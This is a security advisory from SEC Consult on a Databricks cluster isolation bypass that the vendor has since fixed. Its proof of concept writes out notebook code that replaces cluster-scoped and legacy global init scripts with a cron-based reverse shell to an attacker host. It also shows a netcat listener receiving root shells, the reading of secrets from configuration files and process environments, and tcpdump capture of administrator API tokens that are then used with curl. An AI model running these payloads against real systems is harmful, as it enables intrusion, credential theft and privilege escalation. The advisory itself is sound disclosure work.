Vendor description
"Databricks Data Science & Engineering (sometimes called simply "Workspace") is an analytics platform based on Apache Spark. It is integrated with Azure to provide one-click setup, streamlined workflows, and an interactive workspace that enables collaboration between data engineers, data scientists, and machine learning engineers."
Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws
Business recommendation
The vendor disabled legacy scripts and migrated cluster-scoped scripts from DBFS to WSFS. Affected customers received migration instructions.
SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.
We have also written a blog post in collaboration with Elia Florio, Sr. Director of Detection & Response at Databricks and Florian Roth and Marius Bartholdy, security researchers with SEC Consult. It can be found here:
https://r.sec-consult.com/databr
Furthermore, a proof of concept demo video has been published here (Youtube):
https://r.sec-consult.com/dbyoutube
Databricks concepts
Concept 1: Databricks File System (DBFS)
"The Databricks File System (DBFS) is a distributed file system mounted into a Databricks workspace and available on Databricks clusters. DBFS is an abstraction on top of scalable object storage that maps Unix-like filesystem calls to native cloud storage API calls."
Source: https://docs.databricks.com/dbfs/index.html
Therefore developers can easily handle files as if they were local to a compute cluster although they actually reside in a cloud storage.
The recommended way to interact with the DBFS is from within a notebook by using the Databricks Utilities (dbutils). The following command could be used to list the content of a directory:
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/
Concept 2: Init Scripts
Databricks uses a feature called "init script" to customize compute clusters. They can be used to install dependencies or to configure advanced network settings. These are shell scripts that run during the startup of each cluster.
There are different types of init scripts:
(I) Cluster-scoped init scripts only run on the specified cluster and have to be setup by the cluster owner. Before using a cluster-scoped script it has to be uploaded to the DBFS. In the cluster configuration it is then referenced by its file path, e.g dbfs:/databricks/scripts/init-health-check.sh
(II) Global init scripts run on every cluster and have to be configured by an administrative user. Their storage location is not disclosed.
(III) Legacy global init scripts are theoretically deprecated. However, they are enabled by default, even on newly created workspaces. The main difference to the newer global init scripts is that they are stored on the DBFS in a fixed location at dbfs:/databricks/init.
For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts
Vulnerability overview/description
1) Bypassing cluster isolation through insecure defaults and shared storage
A low-privileged user is able to break the isolation between Databricks compute clusters and take over any cluster in a workspace as long as they are allowed to run notebooks. Due to an insecure default configuration combined with insufficient access control, it is possible to gain remote code execution on all clusters of a workspace. With such an access, it is possible to leak secrets and to escalate privileges to those of a workspace administrator.
Attack scenario:
The DBFS is accessible by every user in a Databricks workspace. All files stored here are visible to anyone in the workspace. Cluster-scoped and legacy global init scripts are stored here. An authenticated attacker with the lowest possible permissions in a Databricks workspace could run a notebook to:
- Find and modify an existing cluster-scoped init script.
- Place a new script in the default location for legacy global init scripts.
Both attacks lead to the take over of the compute cluster resources and enable further attacks. Firstly, any secrets stored can be read and, secondly, workspace administrator tokens can be stolen as demonstrated by Joosua Santasalo from Secureworks.
See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html
Proof of concept
1) Bypassing cluster isolation through insecure defaults and shared storage
a) Preparations
For this POC a new Azure Databricks workspace was created with the "premium" pricing tier. It includes an administrative user (databricks-workspace-admin) as well as a newly added low-privileged user (databricks-user) with the default permissions "Workspace access" and "Databricks SQL access". These are the fewest possible permissions a user can have.
To demonstrate both attack scenarios, three clusters were created:
- Cluster on which the databricks-user has permissions to run notebooks ("Can attach to")
- Cluster for the databricks-workspace-admin with a cluster-scoped init script already configured.
- Cluster for the databricks-workspace-admin with no init script
The databricks-user does not have access to the clusters 2 and 3. They cannot even see them in the portal.
For the cluster 2 (with a pre-configured init script) the following notebook code was used by the databricks-workspace-admin to create an init script which simply writes example output to /tmp/init-health-check-success.txt:
dbutils.fs.mkdirs("dbfs:/databricks/scripts/")
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
echo 'Init health check: successful > /tmp/init-helth-check-success.txt' """, True)
display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))
After that the script was applied to cluster 2 as a cluster-scoped init script.
To show the impact of this attack in a more tangible way a keyvault-backed secret scope as well as a databricks-backed secret scope were also created. Their secrets were then used in the spark configuration and in the environment variables of cluster 2 and 3.
Spark configuration:
databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}
azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}}
Environment variables:
databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}
azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}
These serve only as examples. On a real productive compute cluster they could be used to connect to additional cloud storage as described here:
https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal
b) Attack via pre-existing init script
The attacker starts by viewing the content of the DBFS with the following code:
display(dbutils.fs.ls("dbfs:/databricks"))
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
All found .sh files could potentially be cluster-scoped init scripts applied to clusters that the attacker is not aware of. It is not possible to overwrite existing scripts, they can however be renamed or deleted. The cluster configuration is only aware of the script names. Therefore, a newly created script with the same name will be executed. Such a malicious file was created. It includes a reverse shell that will continually attempt to connect to the attacker's server.
# rename file
dbutils.fs.mv("/databricks/scripts/init-health-check.sh",
"/databricks/scripts/init-health-check.sh.old")
#write new file with malicious content
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
As soon as the init script is triggered again, for example via a cluster restart, a reverse shell connection, with root privileges on the compute cluster, is received:
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 48518 received!
bash: cannot set terminal process group (21384): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-110521-h6l5h1n2-10-139-64-5:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a
uname -a
Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-110521-h6l5h1n2-10-139-64-5:~#
c) Attack via legacy global init script
The legacy global init script is enabled by default, therefore an attacker could assume it is turned on and place a script in the default location at dbfs:/databricks/init.
dbutils.fs.mkdirs("dbfs:/databricks/init/")
dbutils.fs.put("dbfs:/databricks/init/global-init.sh"""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
Global init scripts apply to every existing compute cluster. Every cluster will establish a reverse shell now as soon as the script is triggered again. With this attack it is possible to attack compute clusters even if they do not have a cluster-scoped init script set up.
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 53910 received!
bash: cannot set terminal process group (988): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-111747-cmijb28n-10-139-64-4:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-111747-cmijb28n-10-139-64-4:~# uname -a
uname -a
Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-111747-cmijb28n-10-139-64-4:~#
Impact
a) Leaking sensitive information in environment variables and the configuration
Secrets configured in the keyvault-backed secret scope can only be retrieved at runtime by the compute instance itself via a managed identity. Even Databricks workspace administrators cannot read them directly. They are however available to the compute cluster as soon as it is initialized. With remote code execution and root privileges an attacker is able to read the plain text secrets of any cluster.
Spark configuration secrets can be found at /tmp/custom-spark.conf:
root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf
cat custom-spark.conf
spark.databricks.unityCatalog.enforce.permissions false
spark.driver.host 10.139.64.6
spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==
spark.driver.tempDirectory /local_disk0/tmp
spark.databricks.delta.preview.enabled true
spark.databricks.wsfsPublicPreview true
databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET
spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==
spark.databricks.mlflow.autologging.enabled true
spark.executor.tempDirectory /local_disk0/tmp
spark.databricks.enablePublicDbfsFuse false
spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net
spark.master local[*, 4]
azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET
spark.databricks.cloudfetch.hasRegionSupport true
spark.databricks.unityCatalog.enabled true
spark.databricks.automl.serviceEnabled true
spark.databricks.cluster.profile singleNode
root@0121-111747-cmijb28n-10-139-64-4:/tmp#
In order to read secrets in the environment variables, an attacker would need to access the environment of the right process. With root privileges, they are able to access all processes' environments by reading the corresponding /proc/<process-id>/environ file. For simplicity however, the right process-id (888) was used in this POC:
root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ
SHELL=/bin/bash[...]
TERM=xterm-256color
USER=root
SPARK_PUBLIC_DNS=10.139.64.6
azure_keyvault_backed_secret_in_environment=
azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET
SPARK_LOCAL_DIRS=/local_disk0SHLVL=1
MASTER=local[4]
SPARK_HOME=/databricks/spark
SPARK_LOCAL_IP=10.139.64.6
MLFLOW_CONDA_HOME=/databricks/conda
CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*
SPARK_CONF_DIR=/databricks/spark/conf
SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*
PYENV_ROOT=/databricks/.pyenv
DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs
SPARK_ENV_LOADED=1
DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries
PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0
DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python
SPARK_SCALA_VERSION=2.12
MAIL=/var/mail/root
databricks_backed_secret_in_environment=
database-backed-secret-in-environment-value <- THIS IS A SECRET
SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE
b) API Token leak and privilege escalation
Using a vulnerability initially found by Joosua Santasalo from Secureworks it is possible to leak Databricks API tokens of other users, including administrators. The previously proposed hardening technique "Use cluster types that support user isolation wherever possible." does not mitigate the initial vulnerability as all compute cluster types are affected by our new vulnerability.
Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html
It is thereby possible to impersonate any user and to gain privileges of a workspace administrator.
Using the previously established reverse-shell it is possible to capture control-plane traffic with the following command. As soon as a task is started with the administrative user, for example running a simple notebook, the token is sent unencrypted and could be leaked.
(Make sure to verify that you are on the correct cluster when reproducing the issue using the global init script attack vector since the user cluster will also be attacked and send a shell too. This confused us more often than we would like to admit.)
root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes
{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-admin@redacted.onmicrosoft.com"}
apiToken
{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-
. . .
This apiToken could then be used in the Databricks CLI or with the REST API directly. The following example request needed administrative privileges to succeed:
└─$ curl -s adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq
{
"scopes": [
{
"name": "databricks-backed-secret-scope",
"backend_type": "DATABRICKS"
},
{
"name": "key-vault-backed-secret-scope",
"backend_type": "AZURE_KEYVAULT",
"keyvault_metadata": {
"resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",
"dns_name": "https://redacted-databricks-poc.vault.azure.net/"
}
}
]
}
Additional scenarios are possible once RCE is achieved, for example by using the managed identity of the compute clusters to get an access token via the instance metadata service at http://169.254.169.254/metadata/identity/oauth2/token.
Vulnerable / tested versions
The latest Databricks PaaS offering was tested on Azure as well as Amazon Web Services (AWS) with the "Premium" pricing tier as of 2023-01-26.